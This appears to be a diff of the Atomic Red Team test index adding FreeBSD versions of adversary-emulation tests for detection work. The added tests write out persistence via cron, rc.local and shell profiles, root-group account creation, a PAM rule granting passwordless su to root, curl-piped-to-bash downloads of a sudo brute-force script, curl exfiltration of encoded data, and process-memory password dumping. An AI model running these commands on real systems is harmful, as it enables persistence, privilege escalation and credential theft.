@@ -37207,6 +38581,33 @@ persistence: rm /etc/cron.hourly/#{cron_script_name} rm /etc/cron.monthly/#{cron_script_name} rm /etc/cron.weekly/#{cron_script_name} + - name: Cron - Add script to /etc/cron.d folder + auto_generated_guid: '078e69eb-d9fb-450e-b9d0-2e118217c846' + description: 'This test adds a script to /etc/cron.d folder configured to execute + on a schedule. + + ' + supported_platforms: + - linux + input_arguments: + command: + description: Command to execute + type: string + default: echo '*/5 * * * * root echo "Hello + from Atomic Red Team"' > /tmp/atomic.log + cron_script_name: + description: Name of file to store in cron folder + type: string + default: persistevil + executor: + elevation_required: true + name: sh + command: 'echo "#{command}" > /etc/cron.d/#{cron_script_name} + + ' + cleanup_command: 'rm /etc/cron.d/#{cron_script_name} + + ' - name: Cron - Add script to /var/spool/cron/crontabs/ folder auto_generated_guid: 2d943c18-e74a-44bf-936f-25ade6cccab4 description: 'This test adds a script to a /var/spool/cron/crontabs folder configured @@ -38232,7 +39633,6 @@ persistence: description: Turn on Chrome/Chromium developer mode and Load Extension found in the src directory supported_platforms: - - linux:freebsd - linux - windows - macos @@ -38250,7 +39650,6 @@ persistence: auto_generated_guid: 4c83940d-8ca5-4bb2-8100-f46dc914bc3f description: Install the "Minimum Viable Malicious Extension" Chrome extension supported_platforms: - - linux:freebsd - linux - windows - macos @@ -38267,7 +39666,6 @@ persistence: ' supported_platforms: - - linux:freebsd - linux - windows - macos 
@@ -40047,6 +41445,32 @@ persistence: command: 'bash -c ''trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh" EXIT'' + ' + cleanup_command: 'rm -f /tmp/art-fish.txt + + ' + name: sh + - name: Trap EXIT (freebsd) + auto_generated_guid: be1a5d70-6865-44aa-ab50-42244c9fd16f + description: | + Launch bash shell with command arg to create TRAP on EXIT. + The trap executes script that writes to /tmp/art-fish.txt + supported_platforms: + - linux + dependency_executor_name: sh + dependencies: + - description: 'Check if bash is installed. + + ' + prereq_command: 'if [ ! -x "$(command -v bash)" ]; then exit 1; else exit + 0; fi; + + ' + get_prereq_command: "(which pkg && pkg install -y bash)\n" + executor: + command: 'bash -c ''trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh" + EXIT'' + ' cleanup_command: 'rm -f /tmp/art-fish.txt @@ -40064,6 +41488,32 @@ persistence: command: 'bash -c ''trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh" SIGINT && kill -SIGINT $$'' + ' + cleanup_command: 'rm -f /tmp/art-fish.txt + + ' + name: sh + - name: Trap SIGINT (freebsd) + auto_generated_guid: ade10242-1eac-43df-8412-be0d4c704ada + description: | + Launch bash shell with command arg to create TRAP on SIGINT (CTRL+C), then send SIGINT signal. + The trap executes script that writes to /tmp/art-fish.txt + supported_platforms: + - linux + dependency_executor_name: sh + dependencies: + - description: 'Check if bash is installed. + + ' + prereq_command: 'if [ ! -x "$(command -v bash)" ]; then exit 1; else exit + 0; fi; + + ' + get_prereq_command: "(which pkg && pkg install -y bash)\n" + executor: + command: 'bash -c ''trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh" + SIGINT && kill -SIGINT $$'' + ' cleanup_command: 'rm -f /tmp/art-fish.txt 
@@ -40348,6 +41798,27 @@ persistence: ' name: bash elevation_required: true + - name: Create a user account on a FreeBSD system + auto_generated_guid: a39ee1bc-b8c1-4331-8e5f-1859eb408518 + description: 'Create a user via pw + + ' + supported_platforms: + - linux + input_arguments: + username: + description: Username of the user to create + type: string + default: evil_user + executor: + command: 'pw useradd #{username} -s /usr/sbin/nologin -d /nonexistent -c evil_account + + ' + cleanup_command: 'rmuser -y #{username} + + ' + name: sh + elevation_required: true - name: Create a new user in Linux with `root` UID and GID. auto_generated_guid: a1040a30-d28b-4eda-bd99-bb2861a4616c description: 'Creates a new user in Linux and adds the user to the `root` group. @@ -40374,6 +41845,32 @@ persistence: ' name: bash elevation_required: true + - name: Create a new user in FreeBSD with `root` GID. + auto_generated_guid: d141afeb-d2bc-4934-8dd5-b7dba0f9f67a + description: 'Creates a new user in FreeBSD and adds the user to the `root` + group. This technique was used by adversaries during the Butter attack campaign. + + ' + supported_platforms: + - linux + input_arguments: + username: + description: Username of the user to create + type: string + default: butter + password: + description: Password of the user to create + type: string + default: BetterWithButter + executor: + command: | + pw useradd #{username} -g 0 -d /root -s /bin/sh + echo "#{password}" | pw usermod #{username} -h 0 + cleanup_command: 'pw userdel #{username} + + ' + name: sh + elevation_required: true T1053.001: technique: x_mitre_platforms: @@ -41065,9 +42562,8 @@ persistence: persistence on victim host. \nIf the user is able to save the same contents in the authorized_keys file, it shows user can modify the file.\n" supported_platforms: - - linux:freebsd - - macos - linux + - macos executor: name: sh elevation_required: false 
@@ -44848,6 +46344,26 @@ persistence: head -n '-2' ~/.bashrc > /tmp/T1546.004 mv /tmp/T1546.004 ~/.bashrc name: sh + - name: Add command to .shrc + auto_generated_guid: 41502021-591a-4649-8b6e-83c9192aff53 + description: 'Adds a command to the .shrc file of the current user + + ' + supported_platforms: + - linux + input_arguments: + command_to_add: + description: Command to add to the .shrc file + type: string + default: echo "Hello from Atomic Red Team T1546.004" > /tmp/T1546.004 + executor: + command: 'echo ''#{command_to_add}'' >> ~/.shrc + + ' + cleanup_command: | + head -n '-2' ~/.shrc > /tmp/T1546.004 + mv /tmp/T1546.004 ~/.shrc + name: sh - name: Append to the system shell profile auto_generated_guid: 694b3cc8-6a78-4d35-9e74-0123d009e94b description: 'An adversary may wish to establish persistence by executing malicious @@ -44855,7 +46371,6 @@ persistence: ' supported_platforms: - - linux:freebsd - linux input_arguments: text_to_append: @@ -44878,7 +46393,6 @@ persistence: ' supported_platforms: - - linux:freebsd - linux input_arguments: text_to_append: 
@@ -46615,6 +48129,27 @@ persistence: ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && sudo rm $origfilename;fi + ' + - name: rc.local (FreeBSD) + auto_generated_guid: 2015fb48-8ab6-4fbf-928b-0b62de5c9476 + description: 'Modify rc.local + + ' + supported_platforms: + - linux + executor: + name: sh + elevation_required: true + command: | + filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi + printf '%s\n' '#\!/usr/local/bin/bash' | sudo tee /etc/rc.local + echo 'python3.9 -c "import os, base64;exec(base64.b64decode(\"aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo=\"))"' | sudo tee -a /etc/rc.local + printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.local + sudo chmod +x /etc/rc.local + cleanup_command: 'origfilename=''/etc/rc.local.original'';if [ ! -f $origfilename + ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && + sudo rm $origfilename;fi + ' T1209: technique: 
@@ -46932,6 +48467,45 @@ persistence: rm -rf #{systemd_service_path}/#{systemd_service_file} systemctl daemon-reload name: bash + - name: Create SysV Service + auto_generated_guid: 760fe8d2-79d9-494f-905e-a239a3df86f6 + description: 'This test creates a SysV service unit file and enables it as a + service. + + ' + supported_platforms: + - linux + input_arguments: + rc_service_path: + description: Path to rc service file + type: path + default: "/usr/local/etc/rc.d" + rc_service_file: + description: File name of rc service file + type: string + default: art-test + executor: + command: "echo '#\\!/bin/sh' > #{rc_service_path}/#{rc_service_file}\necho + ' ' >> #{rc_service_path}/#{rc_service_file}\necho '#' >> #{rc_service_path}/#{rc_service_file}\necho + '# PROVIDE: art-test' >> #{rc_service_path}/#{rc_service_file}\necho '# + REQUIRE: LOGIN' >> #{rc_service_path}/#{rc_service_file}\necho '# KEYWORD: + shutdown' >> #{rc_service_path}/#{rc_service_file}\necho ' ' >> #{rc_service_path}/#{rc_service_file}\necho + '. 
/etc/rc.subr' >> #{rc_service_path}/#{rc_service_file}\necho ' ' >> #{rc_service_path}/#{rc_service_file}\necho + 'name=\"art_test\"' >> #{rc_service_path}/#{rc_service_file}\necho 'rcvar=art_test_enable' + >> #{rc_service_path}/#{rc_service_file}\necho 'load_rc_config ${name}' + >> #{rc_service_path}/#{rc_service_file}\necho 'command=\"/usr/bin/touch\"' + >> #{rc_service_path}/#{rc_service_file}\necho 'start_cmd=\"art_test_start\"' + >> #{rc_service_path}/#{rc_service_file}\necho '' >> #{rc_service_path}/#{rc_service_file}\necho + 'art_test_start()' >> #{rc_service_path}/#{rc_service_file} \necho '{' + >> #{rc_service_path}/#{rc_service_file}\necho ' ${command} /tmp/art-test.marker' + >> #{rc_service_path}/#{rc_service_file}\necho '}' >> #{rc_service_path}/#{rc_service_file}\necho + ' ' >> #{rc_service_path}/#{rc_service_file} \necho 'run_rc_command + \"$1\"' >> #{rc_service_path}/#{rc_service_file}\nchmod +x #{rc_service_path}/#{rc_service_file}\nservice + art-test enable\nservice art-test start\n" + cleanup_command: | + sysrc -x art_test_enable + rm -f #{rc_service_path}/#{rc_service_file} + name: sh - name: Create Systemd Service file, Enable the service , Modify and Reload the service. auto_generated_guid: c35ac4a8-19de-43af-b9f8-755da7e89c89 
@@ -47852,6 +49426,39 @@ persistence: name: sh elevation_required: false command: 'echo "#{at_command}" | at #{time_spec}' + - name: At - Schedule a job freebsd + auto_generated_guid: 549863fb-1c91-467e-97fc-1fa32b9f356b + description: 'This test submits a command to be run in the future by the `at` + daemon. + + ' + supported_platforms: + - linux + input_arguments: + time_spec: + description: Time specification of when the command should run + type: string + default: now + 1 minute + at_command: + description: The command to be run + type: string + default: echo Hello from Atomic Red Team + dependency_executor_name: sh + dependencies: + - description: 'The `at` executable must exist in the PATH + + ' + prereq_command: 'which at + + ' + get_prereq_command: 'echo ''Please install `at` ; they were not found in the + PATH (Package name: `at`)'' + + ' + executor: + name: sh + elevation_required: false + command: 'echo "#{at_command}" | at #{time_spec}' T1556: technique: modified: '2023-04-11T03:17:32.211Z' @@ -48314,6 +49921,23 @@ persistence: whoami exit cleanup_command: "userdel -r art \n" + - name: Create local account (FreeBSD) + auto_generated_guid: 95158cc9-8f6d-4889-9531-9be3f7f095e0 + description: 'An adversary may wish to create an account with admin privileges + to work with. In this test we create a "art" user with the password art, switch + to art, execute whoami, exit and delete the art user. + + ' + supported_platforms: + - linux + executor: + name: sh + elevation_required: true + command: "pw useradd art -g wheel -s /bin/sh\necho $(openssl passwd -1 art) + | pw mod user testuser1 -h 0 \nsu art\nwhoami\nexit\n" + cleanup_command: 'rmuser -y art + + ' - name: Reactivate a locked/expired account (Linux) auto_generated_guid: d2b95631-62d7-45a3-aaef-0972cea97931 description: "A system administrator may have locked and expired a user account 
@@ -48337,6 +49961,30 @@ persistence: whoami exit cleanup_command: "userdel -r art \n" + - name: Reactivate a locked/expired account (FreeBSD) + auto_generated_guid: '09e3380a-fae5-4255-8b19-9950be0252cf' + description: "A system administrator may have locked and expired a user account + rather than deleting it. \"the user is coming back, at some stage\" An adversary + may reactivate a inactive account in an attempt to appear legitimate. \n\nIn + this test we create a \"art\" user with the password art, lock and expire + the account, try to su to art and fail, unlock and renew the account, su successfully, + then delete the account.\n" + supported_platforms: + - linux + executor: + name: sh + elevation_required: true + command: | + pw useradd art -g wheel -s /bin/sh + echo $(openssl passwd -1 art) | pw mod user testuser1 -h 0 + pw lock art + pw usermod art -e +1d + pw unlock art + pw user mod art -e +99d + su art + whoami + exit + cleanup_command: "rmuser -y art \n" - name: Login as nobody (Linux) auto_generated_guid: 3d2cd093-ee05-41bd-a802-59ee5c301b85 description: 'An adversary may try to re-purpose a system account to appear 
@@ -48355,6 +50003,26 @@ persistence: nobody\nsu nobody\nwhoami\nexit\n" cleanup_command: "chsh --shell /usr/sbin/nologin nobody\ncat /etc/passwd |grep nobody \n# -> nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n" + - name: Login as nobody (freebsd) + auto_generated_guid: 16f6374f-7600-459a-9b16-6a88fd96d310 + description: 'An adversary may try to re-purpose a system account to appear + legitimate. In this test change the login shell of the nobody account, change + its password to nobody, su to nobody, exit, then reset nobody''s shell to + /usr/sbin/nologin. + + ' + supported_platforms: + - linux + executor: + name: sh + elevation_required: true + command: "cat /etc/passwd |grep nobody \n# -> nobody:x:65534:65534:Unprivileged + user:/nonexistent:/usr/sbin/nologin\npw usermod nobody -s /bin/sh\necho + $(openssl passwd -1 art) | pw mod user nobody -h 0\nsu nobody\nwhoami\nexit\n" + cleanup_command: | + pw usermod nobody -s /usr/sbin/nologin + cat /etc/passwd |grep nobody + # -> nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin T1574.012: technique: x_mitre_platforms: 
@@ -48588,6 +50256,37 @@ command-and-control: echo -n 111-11-1111 | base64 curl -XPOST #{base64_data}.#{destination_url} name: sh + - name: Base64 Encoded data (freebsd) + auto_generated_guid: 2d97c626-7652-449e-a986-b02d9051c298 + description: 'Utilizing a common technique for posting base64 encoded data. + + ' + supported_platforms: + - linux + input_arguments: + destination_url: + description: Destination URL to post encoded data. + type: url + default: redcanary.com + base64_data: + description: Encoded data to post using fake Social Security number 111-11-1111. + type: string + default: MTExLTExLTExMTE= + dependency_executor_name: sh + dependencies: + - description: 'Requires curl + + ' + prereq_command: "if [ -x \"$(command -v curl)\" ]; then exit 0; else exit + 1; fi; \n" + get_prereq_command: 'pkg install -y curl + + ' + executor: + command: | + echo -n 111-11-1111 | b64encode -r - + curl -XPOST #{base64_data}.#{destination_url} + name: sh T1568.002: technique: x_mitre_platforms: @@ -50100,6 +51799,33 @@ command-and-control: ' name: sh elevation_required: true + - name: Tor Proxy Usage - FreeBSD + auto_generated_guid: 550ec67d-a99e-408b-816a-689271b27d2a + description: "This test is designed to launch the tor proxy service, which is + what is utilized in the background by the Tor Browser and other applications + with add-ons in order to provide onion routing functionality.\nUpon successful + execution, the tor proxy service will be launched. \n" + supported_platforms: + - linux + dependency_executor_name: sh + dependencies: + - description: "Tor must be installed on the machine \n" + prereq_command: 'if [ -x "$(command -v tor --version)" ]; then exit 0; else + exit 1; fi + + ' + get_prereq_command: 'pkg install -y tor + + ' + executor: + command: | + sysrc tor_enable="YES" + service tor start + cleanup_command: | + service tor stop + sysrc -x tor_enable + name: sh + elevation_required: true T1001: technique: x_mitre_platforms: 
@@ -50213,7 +51939,6 @@ command-and-control: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -50794,7 +52519,6 @@ command-and-control: This test simulates an infected host beaconing to command and control. Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -50883,7 +52607,6 @@ command-and-control: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -50923,7 +52646,6 @@ command-and-control: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -50962,7 +52684,6 @@ command-and-control: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -50993,7 +52714,6 @@ command-and-control: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -51024,7 +52744,6 @@ command-and-control: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -51055,7 +52774,6 @@ command-and-control: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -51086,7 +52804,6 @@ command-and-control: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -51301,9 +53018,8 @@ command-and-control: Note that this test may conflict with pre-existing system configuration. supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: proxy_server: description: Proxy server URL (host:port) @@ -51633,7 +53349,6 @@ collection: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -51663,7 +53378,6 @@ collection: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -51700,9 +53414,8 @@ collection: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: test_folder: description: Path used to store files. 
@@ -51873,6 +53586,36 @@ collection: ' name: bash + - name: X Windows Capture (freebsd) + auto_generated_guid: 562f3bc2-74e8-46c5-95c7-0e01f9ccc65c + description: 'Use xwd command to collect a full desktop screenshot and review + file with xwud + + ' + supported_platforms: + - linux + input_arguments: + output_file: + description: Output file path + type: path + default: "/tmp/T1113_desktop.xwd" + dependency_executor_name: sh + dependencies: + - description: 'Package with XWD and XWUD must exist on device + + ' + prereq_command: | + if [ -x "$(command -v xwd)" ]; then exit 0; else exit 1; fi + if [ -x "$(command -v xwud)" ]; then exit 0; else exit 1; fi + get_prereq_command: "pkg install -y xwd xwud \n" + executor: + command: | + xwd -root -out #{output_file} + xwud -in #{output_file} + cleanup_command: 'rm #{output_file} + + ' + name: sh - name: Capture Linux Desktop using Import Tool auto_generated_guid: 9cd1cccb-91e4-4550-9139-e20a586fcea1 description: 'Use import command from ImageMagick to collect a full desktop @@ -51905,6 +53648,38 @@ collection: ' name: bash + - name: Capture Linux Desktop using Import Tool (freebsd) + auto_generated_guid: 18397d87-38aa-4443-a098-8a48a8ca5d8d + description: 'Use import command from ImageMagick to collect a full desktop + screenshot + + ' + supported_platforms: + - linux + input_arguments: + output_file: + description: Output file path + type: path + default: "/tmp/T1113_desktop.png" + dependencies: + - description: 'ImageMagick must be installed + + ' + prereq_command: 'if import -help > /dev/null 2>&1; then exit 0; else exit + 1; fi + + ' + get_prereq_command: 'pkg install -y ImageMagick7 + + ' + executor: + command: 'import -window root #{output_file} + + ' + cleanup_command: 'rm #{output_file} + + ' + name: sh T1557: technique: modified: '2023-03-30T21:01:37.568Z' 
@@ -52136,6 +53911,39 @@ collection: tail /var/log/syslog cleanup_command: 'unset PROMPT_COMMAND + ' + - name: Logging sh history to syslog/messages + auto_generated_guid: b04284dc-3bd9-4840-8d21-61b8d31c99f2 + description: "There are several variables that can be set to control the appearance + of the bash command prompt: PS1, PS2, PS3, PS4 and PROMPT_COMMAND. The contents + of these variables are executed as if they had been typed on the command line. + The PROMPT_COMMAND variable \"if set\" will be executed before the PS1 variable + and can be configured to write the latest \"bash history\" entries to the + syslog.\n\nTo gain persistence the command could be added to the users .shrc + or .profile \n" + supported_platforms: + - linux + dependency_executor_name: sh + dependencies: + - description: 'This test requires to be run in a bash shell and that logger + and tee are installed. + + ' + prereq_command: | + if [ "$(echo $SHELL)" != "/bin/sh" ]; then echo -e "\n***** sh not running! *****\n"; exit 1; fi + if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi + get_prereq_command: 'echo "" + + ' + executor: + name: sh + elevation_required: true + command: | + PS2=`logger -t "$USER" -f ~/.sh_history` + $PS2 + tail /var/log/messages + cleanup_command: 'unset PS2 + ' - name: Bash session based keylogger auto_generated_guid: 7f85a946-a0ea-48aa-b6ac-8ff539278258 @@ -52148,7 +53956,6 @@ collection: persistence the command could be added to the users .bashrc or .bash_aliases or the systems default .bashrc in /etc/skel/ \n" supported_platforms: - - linux:freebsd - linux dependency_executor_name: sh dependencies: 
@@ -52615,6 +54422,35 @@ collection: ' name: bash + - name: Stage data from Discovery.sh (freebsd) + auto_generated_guid: 4fca7b49-379d-4493-8890-d6297750fa46 + description: 'Utilize curl to download discovery.sh and execute a basic information + gathering shell script + + ' + supported_platforms: + - linux + input_arguments: + output_file: + description: Location to save downloaded discovery.bat file + type: path + default: "/tmp/T1074.001_discovery.log" + dependency_executor_name: sh + dependencies: + - description: 'Check if curl is installed. + + ' + prereq_command: 'if [ ! -x "$(command -v curl)" ]; then exit 1; else exit + 0; fi; + + ' + get_prereq_command: "(which pkg && pkg install -y curl)\n" + executor: + command: 'curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh + | sh -s > #{output_file} + + ' + name: sh T1114.001: technique: x_mitre_platforms: @@ -53110,7 +54946,6 @@ collection: ' supported_platforms: - - linux:freebsd - linux input_arguments: path_to_input_file: @@ -53147,7 +54982,6 @@ collection: ' supported_platforms: - - linux:freebsd - linux input_arguments: path_to_input_file: @@ -53184,7 +55018,6 @@ collection: ' supported_platforms: - - linux:freebsd - linux input_arguments: path_to_input_file: @@ -53221,7 +55054,6 @@ collection: ' supported_platforms: - - linux:freebsd - linux input_arguments: path_to_input_file: 
@@ -57023,6 +58855,36 @@ credential-access: ' cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf} + ' + - name: Malicious PAM rule (freebsd) + auto_generated_guid: b17eacac-282d-4ca8-a240-46602cf863e3 + description: | + Inserts a rule into a PAM config and then tests it. + + Upon successful execution, this test will insert a rule that allows every user to su to root without a password. + supported_platforms: + - linux + input_arguments: + path_to_pam_conf: + description: PAM config file to modify. + type: string + default: "/etc/pam.d/su" + pam_rule: + description: Rule to add to the PAM config. + type: string + default: auth sufficient pam_succeed_if.so uid >= 0 + index: + description: Index where the rule is inserted. + type: integer + default: 8 + executor: + name: sh + elevation_required: true + command: 'sudo sed -i "" "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf} + + ' + cleanup_command: 'sudo sed -i "" "/#{pam_rule}/d" #{path_to_pam_conf} + ' - name: Malicious PAM module auto_generated_guid: 65208808-3125-4a2e-8389-a0a00e9ab326 
@@ -57230,6 +59092,39 @@ credential-access: tail /var/log/syslog cleanup_command: 'unset PROMPT_COMMAND + ' + - name: Logging sh history to syslog/messages + auto_generated_guid: b04284dc-3bd9-4840-8d21-61b8d31c99f2 + description: "There are several variables that can be set to control the appearance + of the bash command prompt: PS1, PS2, PS3, PS4 and PROMPT_COMMAND. The contents + of these variables are executed as if they had been typed on the command line. + The PROMPT_COMMAND variable \"if set\" will be executed before the PS1 variable + and can be configured to write the latest \"bash history\" entries to the + syslog.\n\nTo gain persistence the command could be added to the users .shrc + or .profile \n" + supported_platforms: + - linux + dependency_executor_name: sh + dependencies: + - description: 'This test requires to be run in a bash shell and that logger + and tee are installed. + + ' + prereq_command: | + if [ "$(echo $SHELL)" != "/bin/sh" ]; then echo -e "\n***** sh not running! *****\n"; exit 1; fi + if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi + get_prereq_command: 'echo "" + + ' + executor: + name: sh + elevation_required: true + command: | + PS2=`logger -t "$USER" -f ~/.sh_history` + $PS2 + tail /var/log/messages + cleanup_command: 'unset PS2 + ' - name: Bash session based keylogger auto_generated_guid: 7f85a946-a0ea-48aa-b6ac-8ff539278258 @@ -57242,7 +59137,6 @@ credential-access: persistence the command could be added to the users .bashrc or .bash_aliases or the systems default .bashrc in /etc/skel/ \n" supported_platforms: - - linux:freebsd - linux dependency_executor_name: sh dependencies: 
@@ -57505,6 +59399,50 @@ credential-access: curl -s #{remote_url} |bash cleanup_command: 'userdel -fr art + ' + - name: SUDO Brute Force - FreeBSD + auto_generated_guid: abcde488-e083-4ee7-bc85-a5684edd7541 + description: "An adversary may find themselves on a box (e.g. via ssh key auth, + with no password) with a user that has sudo'ers privileges, but they do not + know the users password. Normally, failed attempts to access root will not + cause the root account to become locked, to prevent denial-of-service. This + functionality enables an attacker to undertake a local brute force password + guessing attack without locking out the root user. \n\nThis test creates the + \"art\" user with a password of \"password123\", logs in, downloads and executes + the sudo_bruteforce.sh which brute force guesses the password, then deletes + the user\n" + supported_platforms: + - linux + input_arguments: + remote_url: + description: url of remote payload + type: url + default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh + dependency_executor_name: sh + dependencies: + - description: 'Check if running on a FreeBSD based machine. 
+ + ' + prereq_command: | + if grep -iq "FreeBSD" /etc/os-release; then echo "FreeBSD"; else echo "NOT FreeBSD"; exit 1; fi + if [ -x "$(command -v openssl)" ]; then echo "openssl is installed"; else echo "openssl is NOT installed"; exit 1; fi + if [ -x "$(command -v sudo)" ]; then echo "sudo is installed"; else echo "sudo is NOT installed"; exit 1; fi + if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi + if [ -x "$(command -v bash)" ]; then echo "bash is installed"; else echo "bash is NOT installed"; exit 1; fi + get_prereq_command: 'pkg update && pkg install -y sudo curl bash + + ' + executor: + name: bash + elevation_required: true + command: | + pw adduser art -g wheel -s /bin/sh + echo "password123" | pw usermod art -h 0 + su art + cd /tmp + curl -s #{remote_url} |bash + cleanup_command: 'rmuser -y art + ' T1003: technique: 
@@ -58473,6 +60411,51 @@ credential-access: grep -i "PASS" "#{output_file}" cleanup_command: 'rm -f "#{output_file}" + ' + - name: Dump individual process memory with sh on FreeBSD (Local) + auto_generated_guid: fa37b633-e097-4415-b2b8-c5bf4c86e423 + description: | + Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to + copy process memory to an external file so it can be searched or exfiltrated later. + On FreeBSD procfs must be mounted. + supported_platforms: + - linux + input_arguments: + output_file: + description: Path where captured results will be placed + type: path + default: "/tmp/T1003.007.bin" + script_path: + description: Path to script generating the target process + type: path + default: "/tmp/T1003.007.sh" + pid_term: + description: Unique string to use to identify target process + type: string + default: T1003.007 + dependencies: + - description: 'Script to launch target process must exist + + ' + prereq_command: | + test -f #{script_path} + grep "#{pid_term}" #{script_path} + get_prereq_command: | + echo '#!/bin/sh' > #{script_path} + echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path} + executor: + name: sh + elevation_required: true + command: | + sh #{script_path} + PID=$(pgrep -n -f "#{pid_term}") + MEM_START=$(head -n 5 /proc/"${PID}"/map | tail -1 | cut -d' ' -f1) + MEM_STOP=$(head -n 5 /proc/"${PID}"/map | tail -1 | cut -d' ' -f2) + MEM_SIZE=$(echo $(($MEM_STOP-$MEM_START))) + dd if=/proc/"${PID}"/mem of="#{output_file}" ibs=1 skip="$MEM_START" count="$MEM_SIZE" + strings "#{output_file}" | grep -i PASS + cleanup_command: 'rm -f "#{output_file}" + ' - name: Dump individual process memory with Python (Local) auto_generated_guid: 437b2003-a20d-4ed8-834c-4964f24eec63 
@@ -58481,7 +60464,6 @@ credential-access: copy a process's heap memory to an external file so it can be searched or exfiltrated later. On FreeBSD procfs must be mounted. supported_platforms: - - linux:freebsd - linux input_arguments: output_file: 
@@ -58780,6 +60762,117 @@ credential-access: tshark -c 5 -i #{interface} name: bash elevation_required: true + - name: Packet Capture FreeBSD using tshark or tcpdump + auto_generated_guid: c93f2492-9ebe-44b5-8b45-36574cccfe67 + description: | + Perform a PCAP. Wireshark will be required for tshark. TCPdump may already be installed. + + Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface ens33. + supported_platforms: + - linux + input_arguments: + interface: + description: Specify interface to perform PCAP on. + type: string + default: em0 + dependency_executor_name: sh + dependencies: + - description: 'Check if at least one of tcpdump or tshark is installed. + + ' + prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command + -v tshark)" ]; then exit 1; else exit 0; fi; + + ' + get_prereq_command: "(which pkg && pkg install -y wireshark-nox11)\n" + executor: + command: | + tcpdump -c 5 -nnni #{interface} + tshark -c 5 -i #{interface} + name: sh + elevation_required: true + - name: Packet Capture FreeBSD using /dev/bpfN with sudo + auto_generated_guid: e2028771-1bfb-48f5-b5e6-e50ee0942a14 + description: 'Opens a /dev/bpf file (O_RDONLY) and captures packets for a few + seconds. + + ' + supported_platforms: + - linux + input_arguments: + ifname: + description: Specify interface to perform PCAP on. 
+ type: string + default: em0 + csource_path: + description: Path to C program source + type: string + default: PathToAtomicsFolder/T1040/src/freebsd_pcapdemo.c + program_path: + description: Path to compiled C program + type: string + default: "/tmp/t1040_freebsd_pcapdemo" + dependency_executor_name: sh + dependencies: + - description: 'compile C program + + ' + prereq_command: 'exit 1 + + ' + get_prereq_command: 'cc #{csource_path} -o #{program_path} + + ' + executor: + command: 'sudo #{program_path} -i #{ifname} -t 3 + + ' + cleanup_command: 'rm -f #{program_path} + + ' + name: sh + elevation_required: true + - name: Filtered Packet Capture FreeBSD using /dev/bpfN with sudo + auto_generated_guid: a3a0d4c9-c068-4563-a08d-583bd05b884c + description: 'Opens a /dev/bpf file (O_RDONLY), sets BPF filter for ''udp'' + and captures packets for a few seconds. + + ' + supported_platforms: + - linux + input_arguments: + ifname: + description: Specify interface to perform PCAP on. + type: string + default: em0 + csource_path: + description: Path to C program source + type: string + default: PathToAtomicsFolder/T1040/src/freebsd_pcapdemo.c + program_path: + description: Path to compiled C program + type: string + default: "/tmp/t1040_freebsd_pcapdemo" + dependency_executor_name: sh + dependencies: + - description: 'compile C program + + ' + prereq_command: 'exit 1 + + ' + get_prereq_command: 'cc #{csource_path} -o #{program_path} + + ' + executor: + command: 'sudo #{program_path} -f -i #{ifname} -t 3 + + ' + cleanup_command: 'rm -f #{program_path} + + ' + name: sh + elevation_required: true - name: Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo auto_generated_guid: 10c710c9-9104-4d5f-8829-5b65391e2a29 description: 'Captures packets with domain=AF_PACKET, type=SOCK_RAW for a few @@ -60072,9 +62165,8 @@ credential-access: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: search_path: description: Path where to start searching from. 
